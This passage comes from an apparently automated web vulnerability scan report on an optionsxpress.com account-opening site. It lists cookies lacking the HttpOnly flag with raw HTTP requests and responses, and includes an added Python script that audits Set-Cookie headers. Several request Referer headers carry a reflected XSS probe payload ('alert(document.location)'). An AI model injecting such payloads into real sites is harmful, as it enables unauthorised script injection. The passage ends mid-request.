Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 65
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "d0881bc1bfcca1:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=4F0588BA4BA85289A097B6894C4CDEEB; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:50 GMT

GIF89a
..........f.............ddd...!.......,....
........aSD$.;

10.38. https://account.optionsxpress.com/images/styles/bubble/t.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/t.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/t.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 44
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "a0227ebc1bfcca1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=F7D09A6D4566E6FDAE591B92DED017AF; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:51 GMT

GIF89a...........f.!.......,...........L...;

10.39. https://account.optionsxpress.com/images/styles/bubble/tl.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/tl.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/tl.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 117
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:40 GMT
Accept-Ranges: bytes
ETag: "d0d71abd1bfcca1:fb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=AFEC1DFC41D58A640965F69675769361; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:50 GMT

GIF89a..........f...........y...e........d.x...2..h.........!......,.........."..I+1%.........%.#.@..fu(...1.h..F.;

10.40. https://account.optionsxpress.com/images/styles/bubble/tr.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/tr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/tr.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 168
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:40 GMT
Accept-Ranges: bytes
ETag: "90ac1cbd1bfcca1:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=9A7796FB49428C50E2B66E9C59EA7A3A; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

GIF89a...[binary image data]...
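
The HttpOnly findings in this section (10.40 onward) are each established by reading the Set-Cookie headers of the captured response by hand. As an added example, not part of the original XSS.CX report, the Python script below performs the same check mechanically over raw HTTP responses: it parses every Set-Cookie header, lists cookies that lack HttpOnly (and Secure, when the response came over HTTPS), and separates real findings from cookie deletions such as the expired SAG cookie in 10.54, which a scanner flags but which stores nothing in the browser. The three sample responses are constructed for this example: the cookie names and values are copied from findings in this report, the surrounding headers are trimmed, and the reference time is fixed to the report's own Date header so the expiry check does not drift.

```python
"""Audit raw HTTP responses for Set-Cookie headers lacking HttpOnly / Secure.

Added example (not part of the XSS.CX report). The SAMPLE_* responses below
are constructed: trimmed imitations of findings 10.44, 10.54 and 10.55.
"""
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Reference time for the "is this cookie already expired" check: the report's
# own Date header. Fixed so the result does not change as the clock moves on.
REPORT_TIME = datetime(2011, 9, 8, 19, 54, 15, tzinfo=timezone.utc)

# Constructed: two cookies scoped to Domain=.optionsxpress.com, no flags (cf. 10.44).
SAMPLE_OX = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/x-javascript\r\n"
    "Set-Cookie: TLTHID=25FD2BB14273AC991AAA5EABBC316BCE; Path=/; Domain=.optionsxpress.com\r\n"
    "Set-Cookie: TLTSID=25FD2BB14273AC991AAA5EABBC316BCE; Path=/; Domain=.optionsxpress.com\r\n"
    "\r\n"
    "// body omitted\r\n"
)
# Constructed: a deletion, expiry in 1990 (cf. 10.54). Nothing is stored, so no exposure.
SAMPLE_DELETE = (
    "HTTP/1.1 302 Moved Temporarily\r\n"
    "Set-Cookie: SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n"
    "\r\n"
)
# Constructed: Secure present, HttpOnly absent (cf. 10.55).
SAMPLE_SECURE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: sk=value:ibg-dark; Expires=Thu, 08-Sep-2011 22:26:56 GMT; Secure\r\n"
    "\r\n"
)


def set_cookie_headers(raw_response):
    """Return the values of all Set-Cookie headers (status line and body ignored)."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    values = []
    for line in head.split("\r\n")[1:]:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "set-cookie":
            values.append(value.strip())
    return values


def parse_set_cookie(header_value):
    """Split 'NAME=value; Attr=x; Flag' into (name, value, {attr_lower: value})."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def is_deletion(attrs, now):
    """True if the header removes the cookie (Max-Age<=0 or Expires in the past)."""
    if "max-age" in attrs:
        try:
            return int(attrs["max-age"]) <= 0
        except ValueError:
            return False
    if "expires" in attrs:
        try:
            return parsedate_to_datetime(attrs["expires"]) <= now
        except (TypeError, ValueError):   # unparsable or naive date: treat as live
            return False
    return False


def audit(raw_response, over_https=True, now=REPORT_TIME):
    """One record per Set-Cookie: which flags are missing and whether it is a deletion."""
    findings = []
    for header_value in set_cookie_headers(raw_response):
        name, _value, attrs = parse_set_cookie(header_value)
        missing = []
        if "httponly" not in attrs:
            missing.append("HttpOnly")
        if over_https and "secure" not in attrs:
            missing.append("Secure")
        findings.append({
            "cookie": name,
            "missing": missing,
            "deletion": is_deletion(attrs, now),
            "domain": attrs.get("domain", ""),   # a wide Domain= scope is worth a look too
        })
    return findings


def actionable(findings):
    """Drop deletions and fully flagged cookies: what a reviewer actually needs to triage."""
    return [f for f in findings if f["missing"] and not f["deletion"]]


if __name__ == "__main__":
    for label, raw in (("10.44-like", SAMPLE_OX), ("10.54-like", SAMPLE_DELETE),
                       ("10.55-like", SAMPLE_SECURE)):
        for f in actionable(audit(raw)):
            print(f"{label}: {f['cookie']} missing {', '.join(f['missing'])}"
                  f" (Domain={f['domain'] or 'host-only'})")
```

Run against the three samples, the script reports TLTHID and TLTSID as missing both flags, sk as missing only HttpOnly, and drops SAG entirely because the header deletes the cookie. Pass over_https=False for responses captured over plain HTTP (the finance.yahoo.com findings below), since a Secure check is meaningless there.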

10.41. https://account.optionsxpress.com/images/welcome/home/log_out.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/welcome/home/log_out.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below; neither Firm nor TLTHID carries the flag). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/welcome/home/log_out.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Firm=OX; expires=Fri, 09-Sep-2011 07:25:29 GMT; path=/
Set-Cookie: TLTHID=E6E958F44B303A4485671B976182E8E0; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

10.42. https://account.optionsxpress.com/images/welcome/home/open_account_4.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/welcome/home/open_account_4.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TLTHID (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/welcome/home/open_account_4.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 18 May 2011 15:39:54 GMT
Accept-Ranges: bytes
ETag: "d7ffadd57115cc1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=CF5297BD4EE7D9842FB52BA82A45D6B5; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:25 GMT

GIF89a...[binary image data]...

10.43. https://account.optionsxpress.com/inc/general.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/general.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TLTHID (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/general.js HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=D89622F2452C5128A6EE59B41762E5D5

Response

HTTP/1.1 200 OK
Content-Length: 353785
Content-Type: application/x-javascript
Last-Modified: Tue, 31 May 2011 14:21:06 GMT
Accept-Ranges: bytes
ETag: "5ccde7fa9d1fcc1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=6BF746C24651B1BAD934E8B86A795596; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:24 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

// SV 5/16/08 cdn_path is the url of the akamai servers. this checks to see if the cdn_path is defined on the page, and if not assignes it a value of null
try {
   if(cdn_path) {
       // do nothing
   }
...[SNIP]...

10.44. https://account.optionsxpress.com/inc/interface.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/interface.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID and TLTSID (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/interface.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 60338
Content-Type: application/x-javascript
Last-Modified: Tue, 03 Aug 2010 21:34:06 GMT
Accept-Ranges: bytes
ETag: "87faba995333cb1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=25FD2BB14273AC991AAA5EABBC316BCE; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=25FD2BB14273AC991AAA5EABBC316BCE; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

// DM - 7/29/05 **** This file contains functions mainly used by designers (open windows, manipulate GUI elements, etc.)
// Ref this file only on pages that need one of these functions.

// Globa
...[SNIP]...

10.45. https://account.optionsxpress.com/inc/js/plugins/accordion.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/js/plugins/accordion.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID and TLTSID (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/js/plugins/accordion.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 9587
Content-Type: application/x-javascript
Last-Modified: Tue, 11 May 2010 17:47:22 GMT
Accept-Ranges: bytes
ETag: "c07627232f1ca1:eba"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=23A6073F461FC4644E08578F9A204196; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=23A6073F461FC4644E08578F9A204196; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* jQuery UI Accordion 1.7.1
*
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http:
...[SNIP]...

10.46. https://account.optionsxpress.com/inc/js/plugins/jquery.blockUI.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/js/plugins/jquery.blockUI.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID and TLTSID (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/js/plugins/jquery.blockUI.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 15677
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:56:04 GMT
Accept-Ranges: bytes
ETag: "709b2a3483f0ca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=3B138D484BD3DC1EBC2548A8FD6DEEF1; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=3B138D484BD3DC1EBC2548A8FD6DEEF1; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

.../*!
* jQuery blockUI plugin
* Version 2.31 (06-JAN-2010)
* @requires jQuery v1.2.3 or later
*
* Examples at: http://malsup.com/jquery/block/
* Copyright (c) 2007-2008 M. Alsup
* Dual
...[SNIP]...

10.47. https://account.optionsxpress.com/inc/newaccount/general.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/general.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID and TLTSID (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/general.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 75328
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:52:59 GMT
Accept-Ranges: bytes
ETag: "f02bedc582f0ca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=090C09DA4E6D42932D2F21943A76C7EF; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=090C09DA4E6D42932D2F21943A76C7EF; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* Include general.js */
var s;
s = "<script language=\"javascript\" type=\"text/javascript\" src=\"/inc/general.js\"></script>";        
document.write(s);

/******************************************
...[SNIP]...

10.48. https://account.optionsxpress.com/inc/newaccount/jquer.ui.all.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquer.ui.all.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below; neither Firm nor TLTHID carries the flag). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/newaccount/jquer.ui.all.css HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; TLTHID=758690FA4AB663400EE3B482D991146F

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Firm=OX; expires=Fri, 09-Sep-2011 07:25:22 GMT; path=/
Set-Cookie: TLTHID=DC968495491D236FAF80D1B2AC99C2C7; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:22 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

10.49. https://account.optionsxpress.com/inc/newaccount/jquery-1.3.2.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquery-1.3.2.min.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID and TLTSID (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/jquery-1.3.2.min.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 59326
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:52:59 GMT
Accept-Ranges: bytes
ETag: "107aedc582f0ca1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0CC03F0C431889309D8520BC90B6D7F4; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=0CC03F0C431889309D8520BC90B6D7F4; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*
* jQuery JavaScript Library v1.3.2
*
* Copyright (c) 2009 John Resig, http://jquery.com/
*
* Permission is hereby granted, free of charge, to any person obtaining
* a copy of this softw
...[SNIP]...

10.50. https://account.optionsxpress.com/inc/newaccount/jquery.autotab.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquery.autotab.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID and TLTSID (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/jquery.autotab.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
